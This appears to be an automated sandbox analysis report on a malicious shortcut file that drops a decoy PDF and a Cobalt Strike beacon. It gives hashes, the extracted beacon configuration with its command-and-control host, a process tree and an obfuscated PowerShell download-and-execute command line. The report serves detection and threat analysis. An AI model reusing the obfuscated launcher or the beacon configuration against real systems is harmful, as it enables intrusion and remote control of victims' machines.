Analysis
-
max time kernel
151s -
max time network
47s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
26-12-2020 20:45
Static task
static1
Behavioral task
behavioral1
Sample
ds7002.lnk
Resource
win7v20201028
Behavioral task
behavioral2
Sample
ds7002.lnk
Resource
win10v20201028
General
-
Target
ds7002.lnk
-
Size
392KB
-
MD5
6ed0020b0851fb71d5b0076f4ee95f3c
-
SHA1
e431261c63f94a174a1308defccc674dabbe3609
-
SHA256
2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
-
SHA512
2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3
Malware Config
Extracted
cobaltstrike
http://pandorasong.com:443/access/
-
access_type
512
-
beacon_type
2048
-
create_remote_thread
0
-
day
0
-
dns_idle
0
-
dns_sleep
0
-
host
pandorasong.com,/access/
-
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_method1
GET
-
http_method2
POST
- injection_process
-
jitter
4352
-
maxdns
255
-
month
0
-
pipe_name
\\%s\pipe\msagent_%x
-
polling_time
300000
-
port_number
443
- proxy_password
- proxy_server
- proxy_username
-
sc_process32
%windir%\syswow64\rundll32.exe
-
sc_process64
%windir%\sysnative\rundll32.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
7.382016e+08
-
unknown2
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown3
0
-
unknown4
0
-
unknown5
2.350256387e+09
-
uri
/radio/xmlrpc/v45
-
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
-
year
0
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exe
flow | pid | process
7 | 1092 | rundll32.exe
-
Loads dropped DLL 1 IoCs
Processes:
rundll32.exe
pid | process
1092 | rundll32.exe
-
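Modifies system certificate store (signature heading lost in extraction; name taken from the rundll32.exe entry in the process tree below)
Processes:
rundll32.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | rundll32.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 | rundll32.exe
Note: a write under AuthRoot\Certificates by a process that has just made a TLS connection is often Windows' automatic root-certificate update, not the sample installing its own root. This thumbprint appears to match the public DST Root CA X3 root; confirm it before treating the event as certificate-store tampering.
-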
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exe
pid | process
2016 | powershell.exe
2016 | powershell.exe
2016 | powershell.exe
2016 | powershell.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exe
pid | process
1824 | AcroRd32.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exe
description | pid | process
Token: SeDebugPrivilege | 2016 | powershell.exe
-
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
AcroRd32.exe
pid | process
1824 | AcroRd32.exe
1824 | AcroRd32.exe
1824 | AcroRd32.exe
1824 | AcroRd32.exe
-
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
cmd.exe powershell.exe csc.exe csc.exe
description | pid | process | target process
PID 1048 wrote to memory of 2016 | 1048 | cmd.exe | powershell.exe
PID 1048 wrote to memory of 2016 | 1048 | cmd.exe | powershell.exe
PID 1048 wrote to memory of 2016 | 1048 | cmd.exe | powershell.exe
PID 2016 wrote to memory of 1468 | 2016 | powershell.exe | csc.exe
PID 2016 wrote to memory of 1468 | 2016 | powershell.exe | csc.exe
PID 2016 wrote to memory of 1468 | 2016 | powershell.exe | csc.exe
PID 1468 wrote to memory of 1328 | 1468 | csc.exe | cvtres.exe
PID 1468 wrote to memory of 1328 | 1468 | csc.exe | cvtres.exe
PID 1468 wrote to memory of 1328 | 1468 | csc.exe | cvtres.exe
PID 2016 wrote to memory of 340 | 2016 | powershell.exe | csc.exe
PID 2016 wrote to memory of 340 | 2016 | powershell.exe | csc.exe
PID 2016 wrote to memory of 340 | 2016 | powershell.exe | csc.exe
PID 340 wrote to memory of 432 | 340 | csc.exe | cvtres.exe
PID 340 wrote to memory of 432 | 340 | csc.exe | cvtres.exe
PID 340 wrote to memory of 432 | 340 | csc.exe | cvtres.exe
PID 2016 wrote to memory of 1824 | 2016 | powershell.exe | AcroRd32.exe
PID 2016 wrote to memory of 1824 | 2016 | powershell.exe | AcroRd32.exe
PID 2016 wrote to memory of 1824 | 2016 | powershell.exe | AcroRd32.exe
PID 2016 wrote to memory of 1824 | 2016 | powershell.exe | AcroRd32.exe
PID 2016 wrote to memory of 1092 | 2016 | powershell.exe | rundll32.exe
PID 2016 wrote to memory of 1092 | 2016 | powershell.exe | rundll32.exe
PID 2016 wrote to memory of 1092 | 2016 | powershell.exe | rundll32.exe
Processes
-
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk
1⤵
- Suspicious use of WriteProcessMemory
-
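C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='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';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;
2⤵
Note: 0x40 is 64, so $fz resolves to 'FromBase64String'; the Base64 blob in $zk is decoded to ASCII and executed with iex. A detection keyed on the literal string FromBase64String will not match this command line.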
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B5B.tmp" "c:\Users\Admin\AppData\Local\Temp\gkhq2szw\CSC8CF4C778B25428885EF4C7F50B9CE52.TMP"
4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C07.tmp" "c:\Users\Admin\AppData\Local\Temp\afkxno03\CSC44D10F4CAF2E4BCCB8FE2B3530CB558C.TMP"
4⤵
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"
3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Modifies system certificate store
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES3B5B.tmp
MD5: 9ce87fcc9ac0d30aad3c1cc2f8fe9725
SHA1: 76fc443aef1f78529027f3a3c13ee9b692e975b9
SHA256: 0b7a6cd56792238b652e7e12f441cbf93a28bba9b218904b8b8278c82c35ec68
SHA512: a78a713ab1192cd6e9591ab7b6de50385b80b7448ccdc094e19c3cc613e1735e0ef88f798cd5762766c49ef3712339873b7a7a80ab047f8cde1041d7c176a4bc
-
C:\Users\Admin\AppData\Local\Temp\RES3C07.tmp
MD5: 70c5ceb9b18d9423be49dbbd47f249eb
SHA1: b1b0aed8831f1cea9f34f63baa387c41ce9a9ea0
SHA256: 86c5393793a1ea7fdb572aa9af0300cacbcc7684d4d1de191e4b47d36d9295f1
SHA512: a39a755f5718722046b139f0e49cc50feec833f5a082158cefe6170a2715cbbe7f74d60f9cf13565cdac03ba91b58fd76c28d05ba7126843d15e3313ef6fb422
-
C:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.dll
MD5: 75131e6de34693b469c8ac4d95db71c2
SHA1: d7f3c2df82ed5f1c92226b13a7f4599591a835db
SHA256: 5ef4ddd82f4c0f00102a11910a1916121c66ba59acb6412fd92287fbe17fe702
SHA512: acd68554d5638422b01e941f9415adfed944680916ff874d0cf9dc81f0075a118b783055dfbd19336c6d05d5fdf7b1294721668c925da1e357d166f66af7664e
-
C:\Users\Admin\AppData\Local\Temp\ds7002.PDF
MD5: 313f4808aa2a2073005d219bc68971cd
SHA1: 053fb60530e884851eb8b6aebbec4570ec788d4a
SHA256: b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1
SHA512: 1d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d
-
C:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.dll
MD5: 2cc581106f4fb709652a076a98be5cab
SHA1: 751583b188952b5cb82702f6d1fe77909492fd07
SHA256: 4f45532f439329c3903d95ca98f608fe162dd5837ee96be6d229b7465ff7c867
SHA512: 62e31ac227ffae973be5b77940d763b94582a313e4444c457fc8bfcc3228c42eec79f0d626be231c5c0f034ccb5de30b4b2b13932ae49cc94f42aeb7c4806382
-
C:\Users\Admin\AppData\Local\cyzfc.dat
MD5: 16bbc967a8b6a365871a05c74a4f345b
SHA1: 9858d5cb2a6614be3c48e33911bf9f7978b441bf
SHA256: b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
SHA512: 68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
-
\??\c:\Users\Admin\AppData\Local\Temp\afkxno03\CSC44D10F4CAF2E4BCCB8FE2B3530CB558C.TMP
MD5: f0dae506cb4b6a151d20c3ef92994bc6
SHA1: fec248adb94d4e694bf7917ebed255253916336a
SHA256: f5aba728e2c829652008f0a4363bdff20a56e75cd18cb63cfeea3ea128aa04ae
SHA512: 5c02eff30fa7409abbcb88a86cfd4188e9f5dddd97bd5295e8c5d2e253b52305d4b0219354e431fdcbf04a33c273106624603256fdc9c91245055ef728b1f71b
-
\??\c:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.0.cs
MD5: 171a88ab4fad87acfd2e5032eb0c6113
SHA1: 754de0e7656c558d335710fc41cbf196d39c1a19
SHA256: 5473b5550a65171ee7d5977d673c97e41e9ec16fad10ec5ab8aa3b7c798577a6
SHA512: 87ef6ac53a00d21f2df4d81ec5956861a4b539b10f5855345aa068c0d9d971f3329477e485471eb40b9eeea59f01fd3c42c4ab2f25e71d825cbf3586be0206b8
-
\??\c:\Users\Admin\AppData\Local\Temp\afkxno03\afkxno03.cmdline
MD5: d683f5d5b34b38854af2717581282ea1
SHA1: 1652f310ddbfc1096be76c3b881ec6a1d9c47325
SHA256: 07891ed2e8e22e93d569d9febbb17e78242d0490c1f211184662d1db40741037
SHA512: 2ba5f26cda0563aa23f9525faf65ef6b76f703e8896f43b6653765139c4a950da3ec15634e3196ca736625cfa25ea8233054e86f9566623653fa7ce76bf1b50c
-
\??\c:\Users\Admin\AppData\Local\Temp\gkhq2szw\CSC8CF4C778B25428885EF4C7F50B9CE52.TMP
MD5: 01740e75e51dc0746ce28a43c042c62e
SHA1: cf76dbc305f364b6a55adf1e7a0d72ab38771ae7
SHA256: 21af03fd27d47acc91cb5e592ba1aab85ee1ad6856ba43aba832405c88425906
SHA512: 7eeb3780d78689a256717eacb418f2820b4494aca1900ba7a0a46dc615e2b871937c8482d509440c06cef91e90e865cec63280c5ea4f439293b5ce2ad400874e
-
\??\c:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.0.cs
MD5: cdcb629e6587254315606a6ba3764745
SHA1: d5b706ca48b7af8926926e80565148f725c75393
SHA256: 3c131fcda0193278274e4ae82bf8363e17fcc0d1110d486072061549e0b0db55
SHA512: 29f17e62d18c716445e09f10dfcae7e5eef72ce0a64a3a9bd8e30108beabe55029f4b70ed5f4926772c791e7fb688b7f2d0ff777641bd86c79421189b7a8cadc
-
\??\c:\Users\Admin\AppData\Local\Temp\gkhq2szw\gkhq2szw.cmdline
MD5: c7991200eb269f2a338993f25b75eb66
SHA1: b6ff8f448b4411641b980fd9344299c6e33dc9ac
SHA256: a2dfb9828a7bc5a669e4d62672c79c3727cb3269a6c9da82a4a5d0016f0de1cc
SHA512: c1fbf76b2d91bea096c89c9a55f981709fa3b47cfd59e3c20429aa28ac0d253dfd067567000005a7cb69ee5a2595b1370a90d34711955a965b5ff4aef256e61f
-
\Users\Admin\AppData\Local\cyzfc.dat
MD5: 16bbc967a8b6a365871a05c74a4f345b
SHA1: 9858d5cb2a6614be3c48e33911bf9f7978b441bf
SHA256: b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
SHA512: 68c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
-
memory/340-18-0x0000000000000000-mapping.dmp
-
memory/432-21-0x0000000000000000-mapping.dmp
-
memory/1092-32-0x0000000001B90000-0x0000000001C0E000-memory.dmp
Filesize: 504KB
-
memory/1092-31-0x0000000000320000-0x0000000000360000-memory.dmp
Filesize: 256KB
-
memory/1092-27-0x0000000000000000-mapping.dmp
-
memory/1328-13-0x0000000000000000-mapping.dmp
-
memory/1468-10-0x0000000000000000-mapping.dmp
-
memory/1824-26-0x0000000000000000-mapping.dmp
-
memory/2016-5-0x000000001AA60000-0x000000001AA61000-memory.dmp
Filesize: 4KB
-
memory/2016-4-0x0000000002560000-0x0000000002561000-memory.dmp
Filesize: 4KB
-
memory/2016-9-0x000000001C320000-0x000000001C321000-memory.dmp
Filesize: 4KB
-
memory/2016-25-0x000000001A9A0000-0x000000001A9A1000-memory.dmp
Filesize: 4KB
-
memory/2016-7-0x000000001A7E0000-0x000000001A7E1000-memory.dmp
Filesize: 4KB
-
memory/2016-8-0x000000001C250000-0x000000001C251000-memory.dmp
Filesize: 4KB
-
memory/2016-17-0x0000000002750000-0x0000000002751000-memory.dmp
Filesize: 4KB
-
memory/2016-3-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmp
Filesize: 9.9MB
-
memory/2016-2-0x0000000000000000-mapping.dmp
-
memory/2016-6-0x0000000002720000-0x0000000002721000-memory.dmp
Filesize: 4KB